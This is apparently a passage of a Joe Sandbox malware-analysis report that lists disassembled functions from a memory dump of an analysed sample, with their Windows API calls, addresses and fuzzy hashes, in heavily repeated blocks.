Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: defd1332cf1dc31d6aeb2e7ba8b7ae6e99114233d5fbbc01711142d145d8d525
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 2451F462B14A9541EB14EFA6DC102B9A3A4FF6CFD8B845532DE9D17B85DF3CD0428310

Function 00007FF70E7C2080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF70E7C210B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: c28a6da3e3d7707d1ac2d6030f3bc742bffb87cacbd33c978be79d81628758cc
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: 98D1E132B18AC287DB34DF15E5846AAB7A5FB88794F449138CB4E53B55DB3CE881CB00

Function 00007FF70E78B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF70E78BA9D), ref: 00007FF70E78B6E5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF70E78BA9D), ref: 00007FF70E78B719
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF70E78BA9D), ref: 00007FF70E78B743

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction ID: cda5caba7bedc316ec077dc22915a7678873b15edff792d886e15ec434916f87
Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction Fuzzy Hash: CC012C7660874282E614AF22F95017AA395BF9DBD0F885035EA8D46B45CF3CE5448710

Function 00007FF70E7BFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF70E7BFEE4

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction ID: 9dd30f8a9102f9e8798ebe5820f53d26d7ef3dfaad2b6a3827b122246d8b31a2
Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction Fuzzy Hash: 93310822B1869145F764AA36DC057B9EA91AFA8FE4F849235EE9C47BC5CF3CD5018300

Function 00007FF70E7C5AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF70E7C5D45
RaiseException.KERNEL32 ref: 00007FF70E7C5D56

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction ID: 9d07ef4faf7c13025fb02f18d42edad61524df5766ededd5ed649a8615ae7bf2
Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction Fuzzy Hash: 52B1A073600B858BEB19CF29C88636C7BE0FB48B58F558925DB5D837A4CB3AE491C710

Function 00007FF70E7A8DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7A85E0: GetDC.USER32 ref: 00007FF70E7A85EC
Part of subcall function 00007FF70E7A85E0: GetDeviceCaps.GDI32 ref: 00007FF70E7A85FD
Part of subcall function 00007FF70E7A85E0: ReleaseDC.USER32 ref: 00007FF70E7A860A

GetObjectW.GDI32 ref: 00007FF70E7A8E48

Part of subcall function 00007FF70E7A90B0: GetDC.USER32 ref: 00007FF70E7A90D9
Part of subcall function 00007FF70E7A90B0: GetObjectW.GDI32 ref: 00007FF70E7A9107
Part of subcall function 00007FF70E7A90B0: ReleaseDC.USER32 ref: 00007FF70E7A91BB

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction ID: 09cdb94683b0cf5dedb65220e9ec8f8a132ad145a34a5551ca5e676caec99f6b
Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction Fuzzy Hash: E7814832B08A1686FB24DF6AE8446ADB375FB88B98F446126DE0D57B24DF38E144C350

Function 00007FF70E7AA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF70E7AA315
GetNumberFormatW.KERNEL32 ref: 00007FF70E7AA371

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction ID: 351d3ca29a0d58659ed215f3d8c7b93e1c17b11a27b974519959e0ca86f1f1b7
Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction Fuzzy Hash: 31114722A08B8195E661AF21E8003EAB364FF8CB88FC46135DA8D03768DF3CE145C754

Function 00007FF70E79126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7924C0: CreateFileW.KERNELBASE ref: 00007FF70E79259B
Part of subcall function 00007FF70E7924C0: GetLastError.KERNEL32 ref: 00007FF70E7925AE
Part of subcall function 00007FF70E7924C0: CreateFileW.KERNEL32 ref: 00007FF70E79260E
Part of subcall function 00007FF70E7924C0: GetLastError.KERNEL32 ref: 00007FF70E792617

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7915D0

Part of subcall function 00007FF70E793980: MoveFileW.KERNEL32 ref: 00007FF70E7939BD
Part of subcall function 00007FF70E793980: MoveFileW.KERNEL32 ref: 00007FF70E793A34

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 34527147-0
Opcode ID: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
Instruction ID: 5cb0e37e39ccbe3caf8e91af96a70c1ca27721edd63e4f7c58560be6478044ac
Opcode Fuzzy Hash: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
Instruction Fuzzy Hash: 7B91D222B19A4292EB10EB72E8442AEA361FF58BC4FC16032EE4D57BA5DF3CD555C310

Function 00007FF70E794EB0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF70E794EE2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
Instruction ID: abcaf48b0e62d1305672867fffeb1873f5249177a6a8b238bfe393fa9414adcf
Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
Instruction Fuzzy Hash: DA01847194D58389FA31AB30EC543B5F3A25FAD30AFC82134C5AC07291DF3CA0498A34

Function 00007FF70E7B8C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF70E7B8DD3

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction ID: 80540c1e892667337603e0425be69e30a4d22f9d46107498001799760f410d7b
Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction Fuzzy Hash: EE811521A2824342FAACAA15C84077DA398EF7C744FD83532DD898B695CF3DE805C362

Function 00007FF70E7B89A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF70E7B8B3A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: d6e62448ed69cbd6319909161b1ee7c517394ef804a5aa610f5d4046dc45fc9d
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: 9C711621A0C28246FB6CEA24C84037EE7989F69744F943535DDC99B7C6CF2DE8468762

Function 00007FF70E79C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

gj, xrefs: 00007FF70E79C97B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction ID: c2b5df2013b6c20779c4feafde9e5283f651e319cd52f8460cb88330dd570844
Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction Fuzzy Hash: B451B2377286908BD754CF25E800A9EB3A5F788758F445126EF8A93B09CB3DE945CF40

Function 00007FF70E7BC838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF70E7BC874

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction ID: f7236b79e95b29fe3d6ec8471fa32a4bc352dadd79d7faabb2678ff408ea45ab
Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction Fuzzy Hash: F641BD22714A4586EB04EF2AE8142A9B3A5AB5CFD0B8AA036DF5D87754DF3CD042C300

Function 00007FF70E7C0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF70E7C0D24

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction ID: f6dcb39d1ef8bc64d36ebaed8beb13f39e9ac4d364892c7955c0c673545d4954
Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction Fuzzy Hash: B5B09220E17A02C2EA483B11EC8229862A8BF8C714FD4A078C20C41320DF3C20EA4721

Function 00007FF70E7A3964 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction ID: 3529c466bd1af5cbedcb64c39c2db11d68416c7dd0dbc8f22e92759fbb659622
Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction Fuzzy Hash: 01822773A096C186D705DF28D8042BCBBA1EB99B88F5DD13ADA5E07385EB3DD845C320

Function 00007FF70E7876C0 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction ID: f92c70e2ce852ddf44c41db925263c37210b03c22997a1e82463dc4d90422dc5
Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction Fuzzy Hash: B6627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF70E7A53F0 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction ID: 7619754d0bcb4accb11431d2aea8133b88d7e12e092cb8edbfd12a12218b7fbc
Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction Fuzzy Hash: 518202B3A096C18AD724DF28D8446FCBB61FB99B48F499136CA4D47789DB3CD485C720

Function 00007FF70E79BB90 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction ID: cf03f1485b29867792e90a5addf42280e7cd100bdf891cc75bd92561bbb03a3c
Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction Fuzzy Hash: F322E273B206508BD728CF25D89AE5E3766F798344B4B9228DF4ACB785DB38D505CB40

Function 00007FF70E7A4B98 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

